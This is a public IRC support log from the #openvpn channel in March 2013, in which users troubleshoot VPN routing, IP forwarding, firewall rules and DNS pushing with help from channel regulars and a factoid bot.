06:49 < micw> can i setup ip-less bridging with openvpn? i.e. simply having the tun/tap devices there which behaves like one local bridge?
06:55 -!- latenite [~latenite@138.77.122.195] has joined #openvpn
06:59 -!- p3rror [~mezgani@41.249.23.19] has joined #openvpn
07:02 < micw> hey cool. simple routing with minimal openvpn config (static key, 2 fixed peer-to-peer ips) works
07:03 < micw> on ServerA i set a route for IP A2 to the vpn device
07:03 < micw> on ServerB i set the route for IP A2 to the local bridge
07:03 < micw> no idea how the traffic goes way back
07:09 -!- Mcloven [~Mcloven@ppp203-122-218-215.static.internode.on.net] has quit [Read error: Connection reset by peer]
07:13 -!- Mcloven [~Mcloven@ppp203-122-218-215.static.internode.on.net] has joined #openvpn
07:17 -!- latenite [~latenite@138.77.122.195] has quit [Ping timeout: 245 seconds]
07:23 < vaillor> i connected client-server but they don't ping
07:23 < vaillor> Tue Mar 5 10:32:22 2013 Peer Connection Initiated with [AF_INET]192.168.1.128:1194
07:23 < vaillor> Tue Mar 5 10:32:22 2013 Initialization Sequence Completed
07:30 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Read error: Connection reset by peer]
07:38 -!- latenite [~latenite@138.77.122.195] has joined #openvpn
07:40 <+EugeneKay> !firewall
07:40 <@vpnHelper> "firewall" is (#1) please see http://openvpn.net/man#lbBD for more info or (#2) see http://www.secure-computing.net/wiki/index.php/OpenVPN/Firewall for brief notes on disabling firewall rulesets.
07:40 < vaillor> no
07:40 < vaillor> i don't have iptables
07:42 <+EugeneKay> 99.99% of the time that's the reason
07:43 < vaillor> i have other interfaces
07:43 < vaillor> and ping them
07:43 <+EugeneKay> You're trying to ping across interfaces?
07:43 < vaillor> yes
07:44 <+EugeneKay> You need to enable net.conf.ipv4.all.forwarding in sysctl
07:44 <+EugeneKay> !redirect
07:44 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart:
07:44 <@vpnHelper> http://ircpimps.org/redirect.png
07:44 <+EugeneKay> !ipforward
07:44 <@vpnHelper> "ipforward" is (#1) please choose between !linipforward !winipforward !osxipforward and !fbsdipforward or (#2) ip forwarding is needed any time you want packets to flow from 1 interface to another, so from tun to eth, eth to tun, tun to tun, etc etc. it must be enabled in the kernel AND allowed in the firewall
07:44 <+EugeneKay> !linipforward
07:44 <@vpnHelper> "linipforward" is (#1) echo 1 > /proc/sys/net/ipv4/ip_forward for a temp solution (til reboot) or set net.ipv4.ip_forward = 1 in sysctl.conf for perm solution or (#2) chmod +x /etc/rc.d/rc.ip_forward for perm solution in slackware or (#3) you also must allow forwarding in your forward chain in iptables. iptables -I FORWARD -i tun+ -j ACCEPT
07:44 <+EugeneKay> That one ^
07:45 <+EugeneKay> (actually, net.conf.ipv6.... but that's v6)
07:45 < vaillor> i tried echo 1 > /proc/sys/net/ipv4/ip_forward
07:45 < vaillor> but it doesn't work the same
07:45 -!- mirco [~mirco@pd95b6029.dip0.t-ipconnect.de] has joined #openvpn
07:45 <+EugeneKay> Try the redirect flowchart
07:46 < vaillor> i have a ssh daemon on the client
07:46 < vaillor> but it doesn't work with vpn if
07:47 < vaillor> i get a "connection timed out"
07:47 <+EugeneKay> You're skipping around here
07:47 <+EugeneKay> Ping != ssh
07:47 <+EugeneKay> First get ping working (routing and firewalls). Then worry about services
07:48 < vaillor> ok, what do i need to do to get ping working?
07:48 <+EugeneKay> I just told you
07:48 < vaillor> !linipforward
07:48 <@vpnHelper> "linipforward" is (#1) echo 1 > /proc/sys/net/ipv4/ip_forward for a temp solution (til reboot) or set net.ipv4.ip_forward = 1 in sysctl.conf for perm solution or (#2) chmod +x /etc/rc.d/rc.ip_forward for perm solution in slackware or (#3) you also must allow forwarding in your forward chain in iptables. iptables -I FORWARD -i tun+ -j ACCEPT
07:49 < vaillor> i do not use iptables
07:49 < vaillor> echo 1 > /proc/sys/net/ipv4/ip_forward after this, i don't get any changes
07:51 <+EugeneKay> First get ping working (routing and firewalls).
07:53 < vaillor> EugeneKay, i do not use a firewall
07:53 <+EugeneKay> Just because you don't have any rules doesn't mean that it isn't doing anything.
07:56 <+EugeneKay> LOOK at your iptables-save output
07:56 <+EugeneKay> Look at whether you can ping the VPN IP both ways
07:56 <+EugeneKay> Then try pinging your way outwards, making sure you have proper routing set up
07:58 < vaillor> EugeneKay, i already told you that the other interfaces work well
07:58 -!- latenite [~latenite@138.77.122.195] has quit [Ping timeout: 276 seconds]
07:58 <+EugeneKay> No, you told me that you couldn't ping them.
08:04 < vaillor> i can't ping only vpn IF
08:06 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn
08:11 -!- dazo_afk is now known as dazo
08:23 < vaillor> EugeneKay, what can I do to solve the problem?
08:29 < vaillor> 14:40:10 2013 read UDPv4: Connection reset by peer (WSAECONNRESET) (code=10054)
08:29 < vaillor> this is what i get
08:35 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 245 seconds]
08:48 -!- vpopov [~happylife@dyn-60-157.fttbee.kis.ru] has joined #openvpn
08:57 < vaillor> icon's screen are "yellow" what does it mean?
09:16 -!- vpopov [~happylife@dyn-60-157.fttbee.kis.ru] has quit [Read error: Operation timed out]
09:28 -!- nonotza [~nonotza@cpe-74-73-224-62.nyc.res.rr.com] has quit [Quit: nonotza]
09:29 -!- xtz [xtz@DeathStar.Techn0.eu] has quit [Quit: leaving]
09:30 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn
09:34 -!- micw [~micw@178-24-236-6-dynip.superkabel.de] has quit [Read error: Connection reset by peer]
09:34 -!- vpopov [~happylife@dyn-60-219.fttbee.kis.ru] has joined #openvpn
09:46 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn
09:56 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 256 seconds]
10:12 -!- vpopov [~happylife@dyn-60-219.fttbee.kis.ru] has quit [Ping timeout: 255 seconds]
10:13 -!- raidz_away is now known as raidz
10:16 < vaillor> anybody online?
10:16 < dropje> !ask
10:16 <@vpnHelper> "ask" is don't ask to ask, just ask your question please, see this link for how to get help on IRC: http://workaround.org/getting-help-on-irc
10:20 < vaillor> i connected server and client
10:20 < vaillor> but there is a problem
10:20 < vaillor> i can't ping
10:21 < vaillor> root@debian-VM:~# ping 10.3.0.1
10:21 < vaillor> PING 10.3.0.1 (10.3.0.1) 56(84) bytes of data.
10:21 < vaillor> From 10.3.0.2 icmp_seq=1 Destination Host Unreachable
10:23 < dropje> vaillor: read the link posted by the bot: http://workaround.org/getting-help-on-irc you can't expect any help posting just this
10:25 -!- marksaitis [~marksaiti@81.101.81.114] has quit [Ping timeout: 248 seconds]
10:26 -!- vpopov [~happylife@46.251.87.237] has joined #openvpn
10:29 < vaillor> i told the problem
10:30 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn
10:35 < dropje> vaillor: i have a problem.. i google and it doesnt work. whats wrong?
10:35 < vaillor> [17:20:11] i connected server and client
10:35 < vaillor> [17:20:16] but there is a problem
10:35 < vaillor> [17:20:26] i can't ping
10:36 < dropje> vaillor: i can read.. so what are people in this channel supposed to make of that? well, you have a problem? whats wrong? i haven't got a clue
10:36 < dropje> as you didn't supply any information
10:37 < dropje> !welcome
10:37 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. || Also interesting: !man !/30 !topology !iporder !sample !forum
10:37 <@vpnHelper> !wiki !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict)
10:46 -!- xtz [xtz@DeathStar.Techn0.eu] has joined #openvpn
10:47 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn
10:47 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has joined #openvpn
10:55 -!- JSharpe [~JSharpe@46.165.208.207] has joined #openvpn
11:01 < vaillor> the problem is that i can't ping from server to client
11:01 -!- xtz [xtz@DeathStar.Techn0.eu] has quit [Ping timeout: 245 seconds]
11:01 < vaillor> but i can ping from client to server
11:01 -!- Mcloven_ [~Mcloven@ppp203-122-218-215.static.internode.on.net] has joined #openvpn
11:01 < vaillor> no, sorry, i'm wrong
11:02 < vaillor> i can't ping in both directions
11:03 -!- Mcloven__ [~Mcloven@ppp203-122-218-215.static.internode.on.net] has joined #openvpn
11:03 -!- Mcloven [~Mcloven@ppp203-122-218-215.static.internode.on.net] has quit [Read error: Connection reset by peer]
11:04 -!- Mcloven_ [~Mcloven@ppp203-122-218-215.static.internode.on.net] has quit [Read error: Connection reset by peer]
11:07 <+EugeneKay> Non-response to pings is a firewall problem.
11:08 <@krzee> vaillor, if you cant ping either direction, you probably are not on the vpn
11:09 < vaillor> krzee, the screen on the icon is yellow
11:09 <@krzee> aka not-connected
11:10 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit []
11:10 < vaillor> http://pastebin.com/PSjyd2ii
11:10 < vaillor> this is the log
11:10 -!- kobolduk [~kobolduk@office.prolocation.net] has quit [Quit: ["Textual IRC Client: www.textualapp.com"]]
11:16 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn
11:16 <@krzee> should be more log
11:17 <@krzee> and why are you connecting to a machine on your lan?
11:18 <@krzee> and you need log from server 11:18 <@krzee> !logs 11:18 <@vpnHelper> "logs" is (#1) is please pastebin your logfiles from both client and server with verb set to 5 or (#2) In the Windows client(OpenVPN-GUI) right-click the status icon and pick View Log or (#3) In the OS X client(Tunnelblick) right-click it nd select Copy log text to clipboard or (#4) if you dont know how to find your logs, see !logfile 11:18 <@krzee> verb 5 in the configs 11:19 < vaillor> krzee, i'm trying to test it 11:19 < vaillor> and i have only the lan to do it 11:20 < vaillor> http://pastebin.com/LsmJm5ef 11:20 < vaillor> this is the other side 11:21 <@krzee> verb 5 11:21 < vaillor> both client and server? 11:21 <@krzee> !logs 11:21 <@vpnHelper> "logs" is (#1) is please pastebin your logfiles from both client and server with verb set to 5 or (#2) In the Windows client(OpenVPN-GUI) right-click the status icon and pick View Log or (#3) In the OS X client(Tunnelblick) right-click it nd select Copy log text to clipboard or (#4) if you dont know how to find your logs, see !logfile 11:21 <@krzee> whats that say? 11:22 < vaillor> sorry, i'm confusing a all :\ 11:22 <@krzee> just read it 11:26 < vaillor> blank screen on windows log 11:26 < vaillor> Tue Mar 5 18:26:34 2013 us=711029 TCP/UDP: Socket bind failed on local address [undef]: Address already in use 11:26 < vaillor> this is on the client 11:26 < vaillor> WTF 11:26 < vaillor> :\ 11:27 < vaillor> i so difficult to configure a f*****g vpn? with ipsec i did it less 2 mins 11:27 < vaillor> :\ 11:28 < vaillor> with openvpn i'm trying to do it since 4 days 11:29 <+EugeneKay> You have openvpn already running 11:30 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 11:30 < vaillor> ctrl+z doesn't kill it? 11:30 <@dazo> wow! 11:30 <@dazo> ctrl-z suspends a process .... 
11:30 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 11:30 <+EugeneKay> -_- 11:31 < vaillor> oh sorry :\ 11:31 < vaillor> so, now is it running 11:32 <@dazo> a suspended process is not running, just waiting to either be brought back to the "foreground" ... or to be allowed to continue to run in the background 11:32 <@dazo> for an openvpn process ... this anyway sounds wrong ... as it should run daemonized 11:32 <@dazo> (--daemon) 11:33 -!- hg_5_ [~chatzilla@91.234.245.245] has joined #openvpn 11:33 <@krzee> that lil outburst won you a /ig lol 11:34 <@dazo> lol 11:34 < vaillor> now, i try to restart my pc 11:34 < vaillor> brb 11:34 * dazo follows krzee's example 11:35 -!- vaillor [~lol2@2-226-37-187.ip179.fastwebnet.it] has quit [] 11:35 <@krzee> lol 11:36 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 245 seconds] 11:36 <@dazo> "whoops! My suspended processes confuses me! It doesn't work any more! I need to reboot!" ... then you need Unix-101, not openvpn 11:37 <@krzee> ipsec just works when i suspend it! 11:37 <@dazo> lol 11:37 <@krzee> damn you openvpn! 11:37 -!- piele [~Unknown@bakzeil.creativeserver.net] has quit [Ping timeout: 246 seconds] 11:39 -!- piele [~Unknown@bakzeil.creativeserver.net] has joined #openvpn 11:39 -!- vaillor [~lol2@2-226-37-187.ip179.fastwebnet.it] has joined #openvpn 11:39 <+EugeneKay> This guy's issues are deeper than I thought 11:40 <+EugeneKay> I thought it was simple incompetence at reading iptables-save output, based on the log line he gave. 11:43 < vaillor> http://sprunge.us/IREe 11:43 < vaillor> client side 11:44 <@dazo> EugeneKay: There's always /ig as a rescue ;-) 11:44 < vaillor> http://pastebin.com/f0AC3Gy7 11:44 < vaillor> server side 11:45 -!- hg_5_ [~chatzilla@91.234.245.245] has quit [Quit: ChatZilla 0.9.89-rdmsoft [XULRunner 1.9.0.17/2009122204]] 11:45 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 11:50 < vaillor> so? what's the problem? 
11:52 -!- vpopov [~happylife@46.251.87.237] has quit [Read error: No route to host] 11:57 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn 12:00 < vaillor> Tue Mar 05 18:42:38 2013 NOTE: failed to obtain options consistency info from peer -- this could occur if the remote peer is running a version of OpenVPN before 1.5-beta8 or if there is a network connectivity problem, and will not necessarily prevent OpenVPN from running (2200 bytes received from peer, 0 bytes authenticated data channel traffic) -- you can disable the options consistency check 12:00 < vaillor> with --disable-occ. 12:06 -!- mirco [~mirco@pd95b6029.dip0.t-ipconnect.de] has left #openvpn [] 12:07 < DougEFresh> ecrist: 12:07 < DougEFresh> actually 12:07 < DougEFresh> dazo: ping 12:07 < DougEFresh> are you here? 12:07 <@dazo> DougEFresh: pong 12:08 < DougEFresh> dazo: the *.openvpn.net cert has expired 12:08 < DougEFresh> re: forums throws cert error 12:08 < vaillor> dazo, please, can you tell hwhat's wrong in my configuration? 12:08 <@dazo> DougEFresh: that's raidz and/or mattock's responsibility :) 12:08 < DougEFresh> well, perhaps you could cattle prod them for me 12:08 < DougEFresh> :D 12:08 <@dazo> raidz/mattock: ^^^^^ 12:08 < DougEFresh> thank you :D 12:08 * dazo finds the whip :) 12:09 -!- piele [~Unknown@bakzeil.creativeserver.net] has quit [Ping timeout: 276 seconds] 12:09 -!- piele [~Unknown@bakzeil.creativeserver.net] has joined #openvpn 12:10 <@raidz> Hey dazo 12:10 <@dazo> hey! 12:10 < DougEFresh> hello raidz 12:10 * DougEFresh waves 12:10 * DougEFresh posted an announcement for the users for now re: the cert 12:10 <@raidz> Have the cert, need to get it to ecrist or samuli as I don't manage forums server 12:11 -!- p3rror [~mezgani@41.249.23.19] has quit [Ping timeout: 248 seconds] 12:11 <@dazo> and the game is rolling :) 12:11 < DougEFresh> :D 12:11 < DougEFresh> roll roll roll 12:11 < DougEFresh> raidz: do you manage the openvpn main site? 
12:12 <@raidz> yup 12:12 < DougEFresh> may i PM? 12:12 < DougEFresh> :o) 12:13 <@raidz> sure! 12:13 <@raidz> ok, sent cert to samuli/ecrist 12:13 < DougEFresh> thank you 12:13 < vaillor> guys, can you please help me finding errors in my configuration? 12:16 -!- master_of_master [~master_of@p4FF24D0D.dip.t-dialin.net] has joined #openvpn 12:17 -!- master_o1_master [~master_of@p4FF249DB.dip.t-dialin.net] has quit [Read error: Operation timed out] 12:29 -!- dazo is now known as dazo_afk 12:30 -!- smerz [~smerz@a177088.upc-a.chello.nl] has joined #openvpn 12:31 -!- Fabius [~Sbratzber@187.110.4.118] has joined #openvpn 12:36 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has quit [Quit: Ex-Chat] 12:46 -!- cornfeedhobo [~cornfeedh@unaffiliated/cornfeed] has left #openvpn ["Once you know what it is you want to be true, instinct is a very useful device for enabling you to know that it is"] 13:01 -!- Devastator [~devas@unaffiliated/devastator] has quit [Read error: Connection reset by peer] 13:01 -!- Devastator- [~devas@177.18.198.56] has joined #openvpn 13:02 -!- Devastator- [~devas@177.18.198.56] has quit [Changing host] 13:02 -!- Devastator- [~devas@unaffiliated/devastator] has joined #openvpn 13:05 -!- Devastator- is now known as Devastator 13:18 < vaillor> anybody forgot me :\ 13:22 -!- Fabius [~Sbratzber@187.110.4.118] has quit [Quit: Saindo] 13:24 -!- vaillor [~lol2@2-226-37-187.ip179.fastwebnet.it] has quit [] 13:28 -!- Mcloven__ [~Mcloven@ppp203-122-218-215.static.internode.on.net] has quit [Read error: Connection reset by peer] 13:28 -!- Mcloven [~Mcloven@ppp203-122-218-215.static.internode.on.net] has joined #openvpn 13:30 -!- zoredache [~zoredache@pdpc/supporter/professional/zoredache] has joined #openvpn 13:39 -!- marksaitis [~marksaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has joined #openvpn 13:49 -!- Mcloven [~Mcloven@ppp203-122-218-215.static.internode.on.net] has quit [Ping timeout: 240 seconds] 13:53 -!- zoredache 
[~zoredache@pdpc/supporter/professional/zoredache] has left #openvpn [] 13:55 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Read error: Connection reset by peer] 14:01 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [] 14:02 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn 14:08 -!- Orbi [~opera@109.129.16.115] has joined #openvpn 14:11 -!- tyteen4a03 [tyteen4a03@69.50.229.69] has quit [Ping timeout: 272 seconds] 14:15 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [] 14:15 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 14:16 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [Client Quit] 14:16 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 14:19 -!- tyteen4a03 [tyteen4a03@69.50.229.69] has joined #openvpn 14:21 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [] 14:22 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 14:22 -!- Valcorb is now known as ffdfsdqg 14:22 -!- ffdfsdqg [~Valcorb@d54C68BC0.access.telenet.be] has quit [Client Quit] 14:22 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 14:23 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [Client Quit] 14:23 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 14:25 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has quit [Ping timeout: 255 seconds] 14:30 -!- voidnecron [~voidnecro@freebsd.xs4all.nl] has joined #openvpn 14:30 -!- voidnecron [~voidnecro@freebsd.xs4all.nl] has quit [Changing host] 14:30 -!- voidnecron [~voidnecro@unaffiliated/necron] has joined #openvpn 14:32 -!- necron [~voidnecro@unaffiliated/necron] has quit [Ping timeout: 260 seconds] 14:37 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Read error: Connection reset by peer] 14:39 -!- p3rror [~mezgani@41.249.23.19] has joined #openvpn 14:46 -!- voidnecron 
[~voidnecro@unaffiliated/necron] has quit [] 14:47 -!- dazo_afk is now known as dazo 14:59 -!- p3rror [~mezgani@41.249.23.19] has quit [Ping timeout: 245 seconds] 15:05 -!- p3rror [~mezgani@41.249.23.19] has joined #openvpn 15:06 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 15:06 -!- mode/#openvpn [+o krzee] by ChanServ 15:12 -!- mezgani [~mezgani@41.249.95.234] has joined #openvpn 15:14 -!- p3rror [~mezgani@41.249.23.19] has quit [Ping timeout: 245 seconds] 15:25 -!- mezgani [~mezgani@41.249.95.234] has quit [Quit: Leaving] 15:30 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has quit [Ping timeout: 264 seconds] 15:31 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has joined #openvpn 15:42 -!- ade_b [~Ade@redhat/adeb] has quit [Quit: Too sexy for his shirt] 15:46 -!- Orbi [~opera@109.129.16.115] has left #openvpn [] 15:48 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has quit [Ping timeout: 264 seconds] 15:54 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [Ping timeout: 256 seconds] 15:55 -!- albercuba [~albercuba@p57B336C1.dip.t-dialin.net] has joined #openvpn 15:56 < albercuba> hi there 15:56 < albercuba> need some help setting up openvpn server 15:57 < albercuba> !welcome 15:57 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. 
|| Also interesting: !man !/30 !topology !iporder !sample !forum 15:57 <@vpnHelper> !wiki !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict) 16:04 <@krzee> !ask 16:04 <@vpnHelper> "ask" is don't ask to ask, just ask your question please, see this link for how to get help on IRC: http://workaround.org/getting-help-on-irc 16:08 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn --- Log closed Tue Mar 05 16:25:26 2013 --- Log opened Tue Mar 05 16:31:28 2013 16:31 -!- ecrist [~ecrist@token-black.secure-computing.net] has joined #openvpn 16:31 -!- Irssi: #openvpn: Total of 176 nicks [7 ops, 0 halfops, 4 voices, 165 normal] 16:31 -!- mode/#openvpn [+o ecrist] by ChanServ 16:32 -!- randomA [~athena@pool-108-27-215-51.nycmny.fios.verizon.net] has joined #openvpn 16:32 < randomA> hey 16:32 -!- Irssi: Join to #openvpn was synced in 49 secs 16:32 < randomA> i've a problem with my dns showing up on dnsleaktest.com when connected using openvpn. 16:34 < pekster> Why is that a problem? 
If you're redirecting traffic, your DNS requests are still resolved according to the defined DNS servers your OS uses 16:36 < pekster> You can push DNS options across the tunnel, although local DHCP has a way of messing with that on renewals, and Windows does strange things with DNS anyway since it keeps per-interface DNS servers, not OS global ones 16:36 < pekster> !pushdns 16:36 <@vpnHelper> "pushdns" is (#1) push "dhcp-option DNS a.b.c.d" to push dns to the client or (#2) http://thread.gmane.org/gmane.network.openvpn.user/25139/focus=25147 see that mail archive for some info on pushing dns or (#3) http://article.gmane.org/gmane.network.openvpn.user/25149 for a perm fix via regedit or (#4) in unix you'll use the update-resolv-conf script or (#5) also 16:36 <@vpnHelper> http://comments.gmane.org/gmane.network.openvpn.user/31975 reports --register-dns as fixing their problems pushing DNS to windows 7 16:39 < randomA> wait...so if my dns is leaking, i'm still anonymous to the websites i visit 16:40 -!- p3rror [~mezgani@41.249.95.234] has joined #openvpn 16:41 -!- albercuba [~albercuba@p57B336C1.dip.t-dialin.net] has quit [Read error: Connection reset by peer] 16:41 < randomA> but i'm using linux...i know ubuntu has a way to do this. 
16:42 * pekster suggests you read item #4 more closely the bot gave you --- Log closed Tue Mar 05 16:44:27 2013 --- Log opened Tue Mar 05 16:57:08 2013 16:57 -!- ecrist [~ecrist@token-black.secure-computing.net] has joined #openvpn 16:57 -!- Irssi: #openvpn: Total of 177 nicks [6 ops, 0 halfops, 4 voices, 167 normal] 16:57 -!- mode/#openvpn [+o ecrist] by ChanServ 16:57 -!- Irssi: Join to #openvpn was synced in 39 secs 16:58 -!- randomA [~athena@pool-108-27-215-51.nycmny.fios.verizon.net] has quit [Quit: Lost terminal] 17:06 -!- Aprogas_ [aprogas@enki.aprogas.net] has joined #openvpn 17:08 -!- Aprogas [aprogas@enki.aprogas.net] has quit [Ping timeout: 256 seconds] 17:25 -!- Wulf [~Wulf@unaffiliated/wulf] has quit [Ping timeout: 252 seconds] 17:28 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has joined #openvpn 17:28 -!- mode/#openvpn [+o vpnHelper] by ChanServ 17:39 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep] 17:44 -!- dazo is now known as dazo_afk 17:45 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has joined #openvpn 17:48 -!- n0sq [~quassel@75-135-14-61.dhcp.krny.ne.charter.com] has left #openvpn ["http://quassel-irc.org - Chat comfortably. 
Anywhere."] 17:56 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has quit [Ping timeout: 264 seconds] 17:58 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has joined #openvpn 18:06 -!- marksaitis [~marksaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has quit [Ping timeout: 252 seconds] 18:06 -!- kantlivelong [~kantlivel@home.kantlivelong.com] has quit [Ping timeout: 248 seconds] 18:13 -!- kantlivelong [~kantlivel@47.23.189.90] has joined #openvpn 18:14 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has quit [Ping timeout: 264 seconds] 18:22 -!- fluter_ [~fluter@fedora/fluter] has joined #openvpn 18:23 -!- fluter_ [~fluter@fedora/fluter] has quit [Max SendQ exceeded] 18:31 -!- JSharpe [~JSharpe@46.165.208.207] has quit [Quit: Leaving] 18:42 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has joined #openvpn 18:46 -!- MFSOT [~garret@c-24-34-166-26.hsd1.ma.comcast.net] has joined #openvpn 18:51 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has quit [Ping timeout: 264 seconds] 18:53 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Quit: ChatZilla 0.9.89-rdmsoft [XULRunner 1.9.0.17/2009122204]] 18:58 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has joined #openvpn 18:59 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 19:03 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has quit [Ping timeout: 264 seconds] 19:04 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 256 seconds] 19:14 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has joined #openvpn 19:14 -!- MFSOT [~garret@c-24-34-166-26.hsd1.ma.comcast.net] has quit [Read error: Connection reset by peer] 19:21 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has quit [Ping timeout: 264 seconds] 19:27 -!- goldkatze [~nobody@unaffiliated/goldkatze] has quit [Ping timeout: 255 seconds] 19:34 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has joined #openvpn 19:42 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Remote host closed the connection] 19:44 -!- 
ScriptFanix [vincent@Hanaman.riquer.fr] has quit [Ping timeout: 264 seconds] 19:46 -!- raidz is now known as raidz_away 19:53 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has joined #openvpn 20:00 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has quit [Ping timeout: 264 seconds] 20:14 -!- fluter [~fluter@fedora/fluter] has joined #openvpn 20:28 -!- fluter [~fluter@fedora/fluter] has quit [Quit: Leaving] 20:30 -!- mezgani [~mezgani@41.140.180.37] has joined #openvpn 20:33 -!- p3rror [~mezgani@41.249.95.234] has quit [Ping timeout: 245 seconds] 20:37 -!- mezgani [~mezgani@41.140.180.37] has quit [Quit: Leaving] 21:09 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Ping timeout: 240 seconds] 21:22 -!- kothog [~kothog@unaffiliated/kothog] has quit [Ping timeout: 246 seconds] 21:22 -!- kothog [~kothog@unaffiliated/kothog] has joined #openvpn 21:34 -!- JStoker [jstoker@unaffiliated/jstoker] has quit [Excess Flood] 21:46 -!- JStoker [jstoker@unaffiliated/jstoker] has joined #openvpn 22:09 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has joined #openvpn 22:20 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has quit [Ping timeout: 264 seconds] 22:31 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has joined #openvpn 22:35 -!- JStoker [jstoker@unaffiliated/jstoker] has quit [Excess Flood] 22:52 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has quit [Ping timeout: 264 seconds] 22:57 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has joined #openvpn 23:00 -!- JStoker [jstoker@unaffiliated/jstoker] has joined #openvpn 23:16 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Write error: Broken pipe] 23:23 -!- ScriptFanix [vincent@Hanaman.riquer.fr] has quit [Ping timeout: 264 seconds] 23:23 -!- corretico [~luis@190.211.93.38] has quit [Ping timeout: 264 seconds] 23:40 -!- corretico [~luis@190.211.93.38] has joined #openvpn 23:50 -!- Mcloven [~Mcloven@ppp203-122-218-215.static.internode.on.net] has joined #openvpn 23:52 -!- fluter [~fluter@fedora/fluter] has joined #openvpn 
